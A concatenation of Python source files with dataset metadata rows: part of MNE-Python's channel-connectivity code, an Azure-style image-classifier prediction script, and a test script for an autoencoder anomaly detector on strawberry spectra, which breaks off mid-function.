        .. versionadded:: 0.9.0
        """
        from .interpolation import _interpolate_bads_eeg, _interpolate_bads_meg
        _check_preload(self, "interpolation")
        # No bads marked: warn (instead of raising) and leave the data as-is.
        if not self.info['bads']:
            warn('No bad channels to interpolate. Doing nothing...')
        else:
            _interpolate_bads_eeg(self)
            _interpolate_bads_meg(self, mode=mode)
            if reset_bads is True:
                self.info['bads'] = []
        return self
def rename_channels(info, mapping):
    """Rename channels.

    .. warning:: The channel names must have at most 15 characters

    Parameters
    ----------
    info : dict
        Measurement info. Modified in place.
    mapping : dict | callable
        a dictionary mapping the old channel to a new channel name
        e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
        that takes and returns a string (new in version 0.10.0).
    """
    info._check_consistency()
    bads = list(info['bads'])  # make our own local copies
    ch_names = list(info['ch_names'])
    # first check and assemble clean mappings of index and name
    if isinstance(mapping, dict):
        orig_names = sorted(list(mapping.keys()))
        missing = [orig_name not in ch_names for orig_name in orig_names]
        if any(missing):
            raise ValueError("Channel name(s) in mapping missing from info: "
                             "%s" % np.array(orig_names)[np.array(missing)])
        new_names = [(ch_names.index(ch_name), new_name)
                     for ch_name, new_name in mapping.items()]
    elif callable(mapping):
        new_names = [(ci, mapping(ch_name))
                     for ci, ch_name in enumerate(ch_names)]
    else:
        raise ValueError('mapping must be callable or dict, not %s'
                         % (type(mapping),))
    # check we got all strings out of the mapping
    for new_name in new_names:
        _validate_type(new_name[1], 'str', 'New channel mappings')
    # FIFF channel-name fields are limited to 15 characters
    bad_new_names = [name for _, name in new_names if len(name) > 15]
    if len(bad_new_names):
        # BUG FIX: the message previously interpolated `new_names` (every
        # mapping tuple) instead of the offending names collected above.
        raise ValueError('Channel names cannot be longer than 15 '
                         'characters. These channel names are not '
                         'valid : %s' % bad_new_names)
    # do the remapping locally
    for c_ind, new_name in new_names:
        for bi, bad in enumerate(bads):
            if bad == ch_names[c_ind]:
                bads[bi] = new_name
        ch_names[c_ind] = new_name
    # check that all the channel names are unique
    if len(ch_names) != len(np.unique(ch_names)):
        raise ValueError('New channel names are not unique, renaming failed')
    # do the remapping in info
    info['bads'] = bads
    for ch, ch_name in zip(info['chs'], ch_names):
        ch['ch_name'] = ch_name
    info._update_redundant()
    info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Unpack mat files in Python."""
if len(cell) > 0:
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
def read_ch_connectivity(fname, picks=None):
    """Parse FieldTrip neighbors .mat file.
    More information on these neighbor definitions can be found on the related
    FieldTrip documentation pages:
    http://fieldtrip.fcdonders.nl/template/neighbours
    Parameters
    ----------
    fname : str
        The file name. Example: 'neuromag306mag', 'neuromag306planar',
        'ctf275', 'biosemi64', etc.
    picks : array-like of int, shape (n_channels,)
        The indices of the channels to include. Must match the template.
        Defaults to None.
    Returns
    -------
    ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
        The connectivity matrix.
    ch_names : list
        The list of channel names present in connectivity matrix.
    See Also
    --------
    find_ch_connectivity
    Notes
    -----
    This function is closely related to :func:`find_ch_connectivity`. If you
    don't know the correct file for the neighbor definitions,
    :func:`find_ch_connectivity` can compute the connectivity matrix from 2d
    sensor locations.
    """
    from scipy.io import loadmat
    if not op.isabs(fname):
        # bare template name: resolve it against the bundled neighbor files
        templates_dir = op.realpath(op.join(op.dirname(__file__),
                                            'data', 'neighbors'))
        templates = os.listdir(templates_dir)
        for f in templates:
            if f == fname:
                break
            if f == fname + '_neighb.mat':
                # template name was given without its '_neighb.mat' suffix
                fname += '_neighb.mat'
                break
        else:
            # for/else: the loop finished without a match
            raise ValueError('I do not know about this neighbor '
                             'template: "{}"'.format(fname))
        fname = op.join(templates_dir, fname)
    nb = loadmat(fname)['neighbours']
    # 'label' holds channel names; 'neighblabel' one neighbor list per channel
    ch_names = _recursive_flatten(nb['label'], string_types)
    neighbors = [_recursive_flatten(c, string_types) for c in
                 nb['neighblabel'].flatten()]
    assert len(ch_names) == len(neighbors)
    if picks is not None:
        if max(picks) >= len(ch_names):
            raise ValueError('The picks must be compatible with '
                             'channels. Found a pick ({}) which exceeds '
                             'the channel range ({})'
                             .format(max(picks), len(ch_names)))
    connectivity = _ch_neighbor_connectivity(ch_names, neighbors)
    if picks is not None:
        # picking before constructing matrix is buggy
        connectivity = connectivity[picks][:, picks]
        ch_names = [ch_names[p] for p in picks]
    return connectivity, ch_names
def _ch_neighbor_connectivity(ch_names, neighbors):
    """Compute sensor connectivity matrix.
    Parameters
    ----------
    ch_names : list of str
        The channel names.
    neighbors : list of list
        A list of list of channel names. The neighbors to
        which the channels in ch_names are connected with.
        Must be of the same length as ch_names.
    Returns
    -------
    ch_connectivity : scipy.sparse matrix
        The connectivity matrix.
    """
    if len(ch_names) != len(neighbors):
        raise ValueError('`ch_names` and `neighbors` must '
                         'have the same length')
    # Validate the structure first: every entry must be a list of str.
    # (The previous check combined ``not isinstance`` and ``not all`` with
    # ``and``, which could never raise for an actual list — the intended
    # condition is the negation of the conjunction.)
    for neigh in neighbors:
        if not (isinstance(neigh, list) and
                all(isinstance(c, string_types) for c in neigh)):
            raise ValueError('`neighbors` must be a list of lists of str')
    # every listed neighbor must itself be a known channel
    set_neighbors = set([c for d in neighbors for c in d])
    rest = set_neighbors - set(ch_names)
    if len(rest) > 0:
        raise ValueError('Some of your neighbors are not present in the '
                         'list of channel names')
    # start from the identity (each channel neighbors itself) and mark each
    # listed relation
    ch_connectivity = np.eye(len(ch_names), dtype=bool)
    for ii, neigbs in enumerate(neighbors):
        ch_connectivity[ii, [ch_names.index(i) for i in neigbs]] = True
    ch_connectivity = sparse.csr_matrix(ch_connectivity)
    return ch_connectivity
def find_ch_connectivity(info, ch_type):
    """Find the connectivity matrix for the given channels.
    This function tries to infer the appropriate connectivity matrix template
    for the given channels. If a template is not found, the connectivity matrix
    is computed using Delaunay triangulation based on 2d sensor locations.
    Parameters
    ----------
    info : instance of Info
        The measurement info.
    ch_type : str | None
        The channel type for computing the connectivity matrix. Currently
        supports 'mag', 'grad', 'eeg' and None. If None, the info must contain
        only one channel type.
    Returns
    -------
    ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
        The connectivity matrix.
    ch_names : list
        The list of channel names present in connectivity matrix.
    See Also
    --------
    read_ch_connectivity
    Notes
    -----
    .. versionadded:: 0.15
    Automatic detection of an appropriate connectivity matrix template only
    works for MEG data at the moment. This means that the connectivity matrix
    is always computed for EEG data and never loaded from a template file. If
    you want to load a template for a given montage use
    :func:`read_ch_connectivity` directly.
    """
    if ch_type is None:
        # with ch_type unspecified, exactly one type may be present in info
        picks = channel_indices_by_type(info)
        if sum([len(p) != 0 for p in picks.values()]) != 1:
            raise ValueError('info must contain only one channel type if '
                             'ch_type is None.')
        ch_type = channel_type(info, 0)
    elif ch_type not in ['mag', 'grad', 'eeg']:
        raise ValueError("ch_type must be 'mag', 'grad' or 'eeg'. "
                         "Got %s." % ch_type)
    (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
     has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
     has_eeg_coils_and_meg, has_eeg_coils_only) = _get_ch_info(info)
    # map the detected acquisition system to a bundled neighbor template name
    conn_name = None
    if has_vv_mag and ch_type == 'mag':
        conn_name = 'neuromag306mag'
    elif has_vv_grad and ch_type == 'grad':
        conn_name = 'neuromag306planar'
    elif has_4D_mag:
        # distinguish 248- vs 148-channel systems by a marker channel name
        if 'MEG 248' in info['ch_names']:
            idx = info['ch_names'].index('MEG 248')
            grad = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_GRAD
            mag = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG
            if ch_type == 'grad' and grad:
                conn_name = 'bti248grad'
            elif ch_type == 'mag' and mag:
                conn_name = 'bti248'
        elif 'MEG 148' in info['ch_names'] and ch_type == 'mag':
            idx = info['ch_names'].index('MEG 148')
            if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG:
                conn_name = 'bti148'
    elif has_CTF_grad and ch_type == 'mag':
        # CTF systems: choose the template by total channel count
        if info['nchan'] < 100:
            conn_name = 'ctf64'
        elif info['nchan'] > 200:
            conn_name = 'ctf275'
        else:
            conn_name = 'ctf151'
    if conn_name is not None:
        logger.info('Reading connectivity matrix for %s.' % conn_name)
        return read_ch_connectivity(conn_name)
    # no template matched (e.g. EEG): fall back to triangulation
    logger.info('Could not find a connectivity matrix for the data. '
                'Computing connectivity based on Delaunay triangulations.')
    return _compute_ch_connectivity(info, ch_type)
def _compute_ch_connectivity(info, ch_type):
    """Compute channel connectivity matrix using Delaunay triangulations.
    Parameters
    ----------
    info : instance of mne.measuerment_info.Info
        The measurement info.
    ch_type : str
        The channel type for computing the connectivity matrix. Currently
        supports 'mag', 'grad' and 'eeg'.
    Returns
    -------
    ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
        The connectivity matrix.
    ch_names : list
        The list of channel names present in connectivity matrix.
    """
    from scipy.spatial import Delaunay
    from .. import spatial_tris_connectivity
    from ..channels.layout import _auto_topomap_coords, _pair_grad_sensors
    # for VV planar gradiometers, triangulate one sensor per pair and expand
    # the result to both sensors afterwards
    combine_grads = (ch_type == 'grad' and FIFF.FIFFV_COIL_VV_PLANAR_T1 in
                     np.unique([ch['coil_type'] for ch in info['chs']]))
    picks = dict(_picks_by_type(info, exclude=[]))[ch_type]
    ch_names = [info['ch_names'][pick] for pick in picks]
    if combine_grads:
        pairs = _pair_grad_sensors(info, topomap_coords=False, exclude=[])
        if len(pairs) != len(picks):
            raise RuntimeError('Cannot find a pair for some of the '
                               'gradiometers. Cannot compute connectivity '
                               'matrix.')
        xy = _auto_topomap_coords(info, picks[::2])  # only for one of the pair
    else:
        xy = _auto_topomap_coords(info, picks)
    tri = Delaunay(xy)
    neighbors = spatial_tris_connectivity(tri.simplices)
    if combine_grads:
        # expand each pair-level neighbor relation to both sensors of both
        # pairs; the idx * 2 indexing assumes paired sensors occupy
        # consecutive picks, matching the picks[::2] subsampling above
        ch_connectivity = np.eye(len(picks), dtype=bool)
        for idx, neigbs in zip(neighbors.row, neighbors.col):
            for ii in range(2):  # make sure each pair is included
                for jj in range(2):
                    ch_connectivity[idx * 2 + ii, neigbs * 2 + jj] = True
                    ch_connectivity[idx * 2 + ii, idx * 2 + jj] = True  # pair
        ch_connectivity = sparse.csr_matrix(ch_connectivity)
    else:
        # sparse neighbor matrix plus an explicit unit diagonal
        ch_connectivity = sparse.lil_matrix(neighbors)
        ch_connectivity.setdiag(np.repeat(1, ch_connectivity.shape[0]))
        ch_connectivity = ch_connectivity.tocsr()
    return ch_connectivity, ch_names
def fix_mag_coil_types(info):
    """Upgrade legacy magnetometer coil types in-place.

    Parameters
    ----------
    info : dict
        The info dict to correct. Corrections are done in-place.

    Notes
    -----
    Magnetometer coil types 3022 (T1: SQ20483N) and 3023 (T2: SQ20483-A)
    are replaced with 3024 (T3: SQ20950N) in the channel definition records
    of ``info``. Vectorview systems can contain magnetometers with two
    different coil sizes (3022/3023 vs. 3024); files recorded on newer
    hardware sometimes still declare type 3022 for compatibility with older
    Neuromag software, so it is safe to upgrade the records to the true
    coil type. The numerical effect of the coil-size difference on MNE
    current estimates is very small, so running this fix is not mandatory.
    """
    old_mag_inds = _get_T1T2_mag_inds(info)
    # rewrite each legacy magnetometer definition in place
    for idx in old_mag_inds:
        info['chs'][idx]['coil_type'] = FIFF.FIFFV_COIL_VV_MAG_T3
    logger.info('%d of %d T1/T2 magnetometer types replaced with T3.' %
                (len(old_mag_inds), len(pick_types(info, meg='mag'))))
    info._check_consistency()
def _get_T1T2_mag_inds(info):
    """Find T1/T2 magnetometer coil types."""
    legacy_types = (FIFF.FIFFV_COIL_VV_MAG_T1,
                    FIFF.FIFFV_COIL_VV_MAG_T2)
    # indices (into info['chs']) of magnetometers with a legacy coil type
    return [ii for ii in pick_types(info, meg='mag')
            if info['chs'][ii]['coil_type'] in legacy_types]
def _get_ch_info(info):
    """Get channel info for inferring acquisition device."""
    chs = info['chs']
    # Only take first 16 bits, as higher bits store CTF comp order
    coil_types = set([ch['coil_type'] & 0xFFFF for ch in chs])
    channel_types = set([ch['kind'] for ch in chs])
    # any of the three VV magnetometer / planar-gradiometer coil variants
    has_vv_mag = any(k in coil_types for k in
                     [FIFF.FIFFV_COIL_VV_MAG_T1, FIFF.FIFFV_COIL_VV_MAG_T2,
                      FIFF.FIFFV_COIL_VV_MAG_T3])
    has_vv_grad = any(k in coil_types for k in [FIFF.FIFFV_COIL_VV_PLANAR_T1,
                                                FIFF.FIFFV_COIL_VV_PLANAR_T2,
                                                FIFF.FIFFV_COIL_VV_PLANAR_T3])
    # heuristic: old-style files carry a space in the channel names
    is_old_vv = ' ' in chs[0]['ch_name']
    has_4D_mag = FIFF.FIFFV_COIL_MAGNES_MAG in coil_types
    ctf_other_types = (FIFF.FIFFV_COIL_CTF_REF_MAG,
                       FIFF.FIFFV_COIL_CTF_REF_GRAD,
                       FIFF.FIFFV_COIL_CTF_OFFDIAG_REF_GRAD)
    # CTF detected either by its gradiometer coil or by MEG channels that
    # use one of the CTF reference coil types
    has_CTF_grad = (FIFF.FIFFV_COIL_CTF_GRAD in coil_types or
                    (FIFF.FIFFV_MEG_CH in channel_types and
                     any(k in ctf_other_types for k in coil_types)))
    # hack due to MNE-C bug in IO of CTF
    # only take first 16 bits, as higher bits store CTF comp order
    n_kit_grads = sum(ch['coil_type'] & 0xFFFF == FIFF.FIFFV_COIL_KIT_GRAD
                      for ch in chs)
    has_any_meg = any([has_vv_mag, has_vv_grad, has_4D_mag, has_CTF_grad,
                       n_kit_grads])
    # EEG requires both the EEG coil type and the EEG channel kind
    has_eeg_coils = (FIFF.FIFFV_COIL_EEG in coil_types and
                     FIFF.FIFFV_EEG_CH in channel_types)
    has_eeg_coils_and_meg = has_eeg_coils and has_any_meg
    has_eeg_coils_only = has_eeg_coils and not has_any_meg
    return (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
            has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
            has_eeg_coils_and_meg, has_eeg_coils_only)
def make_1020_channel_selections(info, midline="z"):
    """Return dict mapping from ROI names to lists of picks for 10/20 setups.
    This passes through all channel names, and uses a simple heuristic to
    separate channel names into three Region of Interest-based selections:
    Left, Midline and Right. The heuristic is that channels ending on any of
    the characters in `midline` are filed under that heading, otherwise those
    ending in odd numbers under "Left", those in even numbers under "Right".
    Other channels are ignored. This is appropriate for 10/20 files, but not
    for other channel naming conventions.
    If an info object is provided, lists are sorted from posterior to anterior.
    Parameters
    ----------
    info : instance of info
        Where to obtain the channel names from. The picks will
        be in relation to the position in `info["ch_names"]`. If possible, this
        lists will be sorted by y value position of the channel locations,
        i.e., from back to front.
    midline : str
        Names ending in any of these characters are stored under the `Midline`
        key. Defaults to 'z'. Note that capitalization is ignored.
    Returns
    -------
    selections : dict
        A dictionary mapping from ROI names to lists of picks (integers).
    """
    _validate_type(info, "info")
    try:
        from .layout import find_layout
        layout = find_layout(info)
        pos = layout.pos
        ch_names = layout.names
    except RuntimeError:  # no channel positions found
        ch_names = info["ch_names"]
        pos = None
    selections = dict(Left=[], Midline=[], Right=[])
    # lower-case the midline characters once so that e.g. midline="Z" behaves
    # as documented ("capitalization is ignored"); previously only the
    # channel name side was lower-cased
    midline = midline.lower()
    for pick, channel in enumerate(ch_names):
        last_char = channel[-1].lower()  # in 10/20, last char codes hemisphere
        if last_char in midline:
            selection = "Midline"
        elif last_char.isdigit():
            selection = "Left" if int(last_char) % 2 else "Right"
        else:  # ignore the channel
            continue
        selections[selection].append(pick)
    if pos is not None:
        # sort channels from front to center
        # (y-coordinate of the position info in the layout)
        selections = {selection: np.array(picks)[pos[picks, 1].argsort()]
                      for selection, picks in selections.items()}
    return selections
| 37.856937 | 79 | 0.59044 |
795ba7e9d56977e2fd4d2fa3d0226b8ee579a899 | 3,383 | py | Python | ai-engineer-deploying-solutions/module-iot/solution/modules/ImageClassifierService/app/predict.py | DSoftse/Pluralsight | 44bfb372a52815b7c86c1daefaf74542551c21a0 | [
"MIT"
] | 130 | 2017-07-07T21:01:32.000Z | 2022-03-17T11:51:26.000Z | ai-engineer-deploying-solutions/module-iot/solution/modules/ImageClassifierService/app/predict.py | DSoftse/Pluralsight | 44bfb372a52815b7c86c1daefaf74542551c21a0 | [
"MIT"
] | 8 | 2018-02-19T07:12:31.000Z | 2021-04-27T05:59:12.000Z | ai-engineer-deploying-solutions/module-iot/solution/modules/ImageClassifierService/app/predict.py | DSoftse/Pluralsight | 44bfb372a52815b7c86c1daefaf74542551c21a0 | [
"MIT"
] | 307 | 2017-02-17T04:45:02.000Z | 2022-02-23T17:42:07.000Z |
from urllib.request import urlopen
import tensorflow.compat.v1 as tf
from PIL import Image
import numpy as np
# import scipy
# from scipy import misc
import sys
import os
# frozen TensorFlow graph to load (parsed into graph_def by initialize())
filename = 'model.pb'
# text file with one class label per line, same order as the model output
labels_filename = 'labels.txt'
# per-channel (B, G, R) means subtracted during predict_image()
mean_values_b_g_r = (0,0,0)
# target (width, height) used when rescaling input images
size = (256, 256)
# graph tensor holding the class probabilities
output_layer = 'loss:0'
# graph input tensor fed with the normalized image
input_node = 'Placeholder:0'
# filled by initialize(): parsed graph definition and label strings
graph_def = tf.GraphDef()
labels = []
def initialize():
    """Load the frozen graph and the class labels into the module globals.

    Populates ``graph_def`` (from `filename`) and ``labels`` (from
    `labels_filename`); must be called once before `predict_image` /
    `predict_url`.
    """
    print('Loading model...', end='')
    with tf.gfile.FastGFile(filename, 'rb') as f:
        graph_def.ParseFromString(f.read())
        tf.import_graph_def(graph_def, name='')
    print('Success!')
    print('Loading labels...', end='')
    with open(labels_filename, 'rt') as lf:
        for l in lf:
            # strip only the trailing newline; the previous `l[:-1]` chopped
            # the last character of a file without a final newline
            labels.append(l.rstrip('\n'))
    print(len(labels), 'found. Success!')
def crop_center(img, cropx, cropy):
    """Return the central `cropx` x `cropy` window of an (H, W, C) array."""
    height, width, _ = img.shape
    left = width // 2 - cropx // 2
    top = height // 2 - cropy // 2
    print('crop_center: ', width, 'x', height, 'to', cropx, 'x', cropy)
    return img[top:top + cropy, left:left + cropx]
def predict_url(imageUrl):
    """Download the image at `imageUrl` and classify it via `predict_image`."""
    print('Predicting from url: ',imageUrl)
    # the response stream is handed straight to PIL; prediction happens
    # before the connection is closed
    with urlopen(imageUrl) as response:
        return predict_image(Image.open(response))
def predict_image(image):
    """Classify a PIL image with the frozen graph loaded by `initialize`.

    Returns a list of {'Tag', 'Probability'} dicts for every class whose
    rounded probability exceeds 1e-8, or the string 'error: crop_center'
    if center-cropping fails.
    """
    print('Predicting image')
    tf.reset_default_graph()
    tf.import_graph_def(graph_def, name='')
    with tf.Session() as sess:
        prob_tensor = sess.graph.get_tensor_by_name(output_layer)
        input_tensor_shape = sess.graph.get_tensor_by_name('Placeholder:0').shape.as_list()
        network_input_size = input_tensor_shape[1]
        w, h = image.size
        print('Image size', w, 'x', h)
        # scale the short side to the target size, preserving aspect ratio;
        # new_size is (new_width, new_height, channels)
        if w > h:
            new_size = (int((float(size[1]) / h) * w), size[1], 3)
        else:
            new_size = (size[0], int((float(size[0]) / w) * h), 3)
        # resize unless the image already matches; the previous check
        # compared new_size[0] against h, so non-square images at the
        # target size were still resized
        if not (new_size[0] == w and new_size[1] == h):
            print('Resizing to', new_size[0], 'x', new_size[1])
            augmented_image = np.asarray(image.resize((new_size[0], new_size[1])))
        else:
            augmented_image = np.asarray(image)
        # crop the network-sized center region
        try:
            augmented_image = crop_center(augmented_image, network_input_size, network_input_size)
        except Exception:  # narrowed from a bare except; keep best-effort result
            return 'error: crop_center'
        augmented_image = augmented_image.astype(float)
        # RGB -> BGR with per-channel mean subtraction
        red, green, blue = tf.split(axis=2, num_or_size_splits=3, value=augmented_image)
        image_normalized = tf.concat(axis=2, values=[
            blue - mean_values_b_g_r[0],
            green - mean_values_b_g_r[1],
            red - mean_values_b_g_r[2],
        ])
        image_normalized = image_normalized.eval()
        image_normalized = np.expand_dims(image_normalized, axis=0)
        predictions, = sess.run(prob_tensor, {input_node: image_normalized})
        # keep only classes with non-negligible probability
        result = []
        idx = 0
        for p in predictions:
            truncated_probablity = np.float64(round(p, 8))
            if (truncated_probablity > 1e-8):
                result.append({'Tag': labels[idx], 'Probability': truncated_probablity})
            idx += 1
        print('Results: ', str(result))
        return result
795ba989a5085fe1f4f4fcfba0f04fb13bb45396 | 13,069 | py | Python | test.py | YisenLiu-Intelligent-Sensing/SSC_AE | 9aaed69808cd136cc443d8e7005ca2cf2aecfac4 | [
"MIT"
] | null | null | null | test.py | YisenLiu-Intelligent-Sensing/SSC_AE | 9aaed69808cd136cc443d8e7005ca2cf2aecfac4 | [
"MIT"
] | null | null | null | test.py | YisenLiu-Intelligent-Sensing/SSC_AE | 9aaed69808cd136cc443d8e7005ca2cf2aecfac4 | [
"MIT"
] | null | null | null | """
@file test.py
@brief Script for test
@author Yisen Liu
Copyright (C) 2021 Institute of Intelligent Manufacturing, Guangdong Academy of Sciences. All right reserved.
"""
import csv
import glob
import os
import sys
import numpy as np
import tensorflow as tf
from sklearn import metrics
import common as com
import SSC_AE_model
# load parameter.yaml
########################################################################
param = com.yaml_load()
#######################################################################
########################################################################
#save csv file
def save_csv(save_file_path, save_data):
  """Write `save_data` (an iterable of rows) to `save_file_path` as CSV."""
  # newline='' plus an explicit '\n' terminator keeps output identical
  # across platforms
  with open(save_file_path, "w", newline="") as out_file:
    csv.writer(out_file, lineterminator='\n').writerows(save_data)
#load normal train data
def load_normal_train_data(seed):
  """Load the first half of the seed-shuffled healthy samples, normalized."""
  pattern = os.path.join(param["data_directory"], "healthy*.npy")
  healthy = np.concatenate([np.load(p) for p in glob.glob(pattern)], axis=0)
  # deterministic shuffle, then keep the first half as the train split
  np.random.seed(seed)
  np.random.shuffle(healthy)
  train_split = healthy[:healthy.shape[0] // 2]
  # normalization (in place)
  com.normalize_data(train_split)
  return train_split
#load normal test data
def load_normal_test_data(seed):
  """Load the second half of the seed-shuffled healthy samples plus labels."""
  pattern = os.path.join(param["data_directory"], "healthy*.npy")
  healthy = np.concatenate([np.load(p) for p in glob.glob(pattern)], axis=0)
  # the same seed reproduces the shuffle used by load_normal_train_data,
  # so this second half is disjoint from the train split
  np.random.seed(seed)
  np.random.shuffle(healthy)
  test_split = healthy[healthy.shape[0] // 2:]
  # normalization (in place)
  com.normalize_data(test_split)
  # label 0 marks normal samples
  y_true_normal = np.zeros((test_split.shape[0]))
  return test_split, y_true_normal
# load_abnormal_test_data
def load_abnormal_test_data():
  """Load the three anomaly classes.

  Returns the concatenated data, its all-ones labels, the three per-class
  arrays (normalized) and the three class sizes.
  """
  bruise = np.load(os.path.join(param["data_directory"], 'bruise_mean_2.npy'))
  print('bruise:', bruise.shape[0])
  decay = np.load(os.path.join(param["data_directory"], 'decay_mean_2.npy'))
  print('decay:', decay.shape[0])
  contaminated = np.load(
      os.path.join(param["data_directory"], 'contamination_mean_2.npy'))
  print('contaminated:', contaminated.shape[0])
  combined = np.concatenate([bruise, decay, contaminated], axis=0)
  print('abnormal:', combined.shape)
  # label 1 marks anomalous samples
  y_true_abnormal = np.ones((combined.shape[0]))
  # normalize the concatenated copy and each class array in place
  com.normalize_data(combined)
  com.normalize_data(bruise)
  com.normalize_data(decay)
  com.normalize_data(contaminated)
  return (combined, y_true_abnormal, bruise, decay, contaminated,
          bruise.shape[0], decay.shape[0], contaminated.shape[0])
# define cosine_similarity
def cosine_similarity(x1, x2):
  """Pairwise cosine similarity between the rows of `x1` and `x2`.

  Args:
    x1: array of shape (m, d), or (d,) which is treated as (1, d).
    x2: array of shape (n, d), or (d,) which is treated as (1, d).

  Returns:
    Array of shape (m, n); entry (i, j) is the cosine similarity of
    x1[i] and x2[j]. A small epsilon in the denominator guards against
    zero-norm rows.
  """
  if x1.ndim == 1:
    x1 = x1[np.newaxis]
  if x2.ndim == 1:
    x2 = x2[np.newaxis]
  x1_norm = np.linalg.norm(x1, axis=1)
  x2_norm = np.linalg.norm(x2, axis=1)
  # The denominator must pair every row norm of x1 with every row norm of
  # x2. The previous element-wise product x1_norm * x2_norm only broadcast
  # when m == 1 (the call pattern in this script) or m == n, and was
  # numerically wrong in the latter case; np.outer handles all shapes.
  cosine_sim = np.dot(x1, x2.T) / (np.outer(x1_norm, x2_norm) + 1e-10)
  return cosine_sim
########################################################################
# main test.py
########################################################################
if __name__ == "__main__":
  #set GPU
  os.environ['CUDA_VISIBLE_DEVICES'] = '2'
  # make output result directory
  os.makedirs(param["result_directory"], exist_ok=True)
  # per-run metric accumulators over the 10 repetitions
  auc_total = np.zeros((10))
  prec_total = np.zeros((10))
  recall_total = np.zeros((10))
  f1_total = np.zeros((10))
  ds_total = np.zeros((10))
  acc_normal_total = np.zeros((10))
  acc_bruise_total = np.zeros((10))
  acc_decay_total = np.zeros((10))
  acc_contaminated_total = np.zeros((10))
  # initialize lines in csv for statistical result
  csv_lines = []
  # results by type
  csv_lines.append(["AUC", "F1 score","ACC_normal","ACC_bruise","ACC_decay","ACC_contaminated"])
  for itr in range (0,10):
    # setup anomaly score file path
    sample_type='strawberry'
    anomaly_score_csv = "{result}/anomaly_score_{sample_type}_{itr}itr.csv".format(result=param["result_directory"],
                                                                                  sample_type=sample_type,itr=itr)
    anomaly_score_list = []
    # setup decision result file path
    decision_result_csv = "{result}/decision_result_{sample_type}_{itr}itr.csv".format(result=param["result_directory"],
                                                                                      sample_type=sample_type,
                                                                                      itr=itr)
    decision_result_list = []
    # load test file
    # itr doubles as the shuffle seed, so each run gets a different split
    normal_test_data,y_true_normal = load_normal_test_data(seed=itr)
    abnormal_test_data,y_true_abnormal,abnormal_data_mean_1,abnormal_data_mean_2,abnormal_data_mean_3,abnormal_size1,abnormal_size2,abnormal_size3 = load_abnormal_test_data()
    y_true_normal=np.array(y_true_normal)
    y_true_abnormal=np.array(y_true_abnormal)
    y_true=np.concatenate([y_true_normal,y_true_abnormal],axis=0)
    test_data=np.concatenate([normal_test_data,abnormal_test_data],axis=0)
    normal_train_data=load_normal_train_data(itr)
    with tf.Graph().as_default():
      # Input tensor define
      normal_input_tensor = tf.placeholder(tf.float32, shape=[None, normal_test_data.shape[1]],name='normal_input_tensor')
      abnormal_input_tensor = tf.placeholder(tf.float32, shape=[None, normal_test_data.shape[1]],name='abnormal_input_tensor')
      Discriminator_normal_label_tensor = tf.placeholder(tf.float32, shape=[None,2], name='Discriminator_normal_label_tensor')
      Discriminator_abnormal_label_tensor = tf.placeholder(tf.float32, shape=[None,2], name='Discriminator_abnormal_label_tensor')
      # Build AE
      rebuilt_normal_data,code_normal_data=SSC_AE_model.AE(normal_input_tensor,reuse=tf.AUTO_REUSE)
      rebuilt_abnormal_data,code_abnormal_data=SSC_AE_model.AE(abnormal_input_tensor,reuse=True)
      # Build discriminator
      dis_pred_normal = SSC_AE_model.discriminator(SSC_AE_model.AE(normal_input_tensor,reuse=True)[1],reuse=True)
      dis_pred_abnormal = SSC_AE_model.discriminator(SSC_AE_model.AE(abnormal_input_tensor,reuse=True)[1],reuse=True)
      vars = tf.trainable_variables()
      #test step for AE model
      def AE_test_step(sess, test_data):
        feed_dict = {normal_input_tensor: test_data}
        rebuilt_normal_data_value = sess.run(rebuilt_normal_data, feed_dict=feed_dict)
        return rebuilt_normal_data_value
      #test step for self-supervised classifier model
      def Disc_test_step(sess, test_data):
        feed_dict = {normal_input_tensor: test_data}
        disc_pred_value = sess.run(dis_pred_normal, feed_dict=feed_dict)
        return disc_pred_value
      # test step for getting AE code
      def Code_test_step(sess, test_data):
        feed_dict = {normal_input_tensor:test_data}
        code_pred_value = sess.run(code_normal_data, feed_dict=feed_dict)
        code_pred_value = code_pred_value.reshape((code_pred_value.shape[0], code_pred_value.shape[1]))
        return code_pred_value
      print("============== MODEL LOAD ==============")
      # set model path
      sample_type = 'strawberry'
      model_file = "{model}/model_SSC_AE_{sample_type}_{itr}itr.model".format(model=param["model_directory"],
                                                                              sample_type=sample_type,itr=itr)
      print(model_file)
      print("\n============== BEGIN TEST ==============")
      # load model file
      with tf.Session() as sess:
        #load model
        model_saver = tf.train.Saver()
        model_saver.restore(sess,model_file)
        #testing
        rebuilt_test_data = AE_test_step(sess, test_data=test_data)
        disc_pred_test_data = Disc_test_step(sess, test_data=test_data)
        code_pred_test_data = Code_test_step(sess, test_data=test_data)
        train_code_vetor = Code_test_step(sess, test_data=normal_train_data)
        # calculate rebuilt error
        rebuilt_errors = -np.mean(np.square(test_data - rebuilt_test_data), axis=1)
        #rebuilt rebuit cosine_similarity error
        rebuilt_cosine_errors = []
        train_rebuilt_vetor = AE_test_step(sess, test_data=normal_train_data)
        for i in range(test_data.shape[0]):
          cos_similarity = cosine_similarity( rebuilt_test_data[i], train_rebuilt_vetor) # shape(len(test), len(train))
          rebuilt_cosine_errors.append(np.mean(cos_similarity))
        # anomaly score: negated mean cosine similarity to the training
        # reconstructions (higher score = more anomalous)
        errors = np.array(rebuilt_cosine_errors)
        y_pred = -errors
        for i in range(y_true.shape[0]):
          anomaly_score_list.append([y_true[i], y_pred[i]])
        y_pred = np.array(y_pred)
        # save anomaly score
        save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list)
        com.logger.info("anomaly score result -> {}".format(anomaly_score_csv))
        #make normal/abnormal decisions
        # NOTE(review): this labels exactly len(normal_test_data) lowest
        # scores as normal, i.e. the split sizes are assumed known at test
        # time — confirm this evaluation protocol is intended
        decision = np.zeros((y_pred.shape[0]))
        index = np.argsort(y_pred)
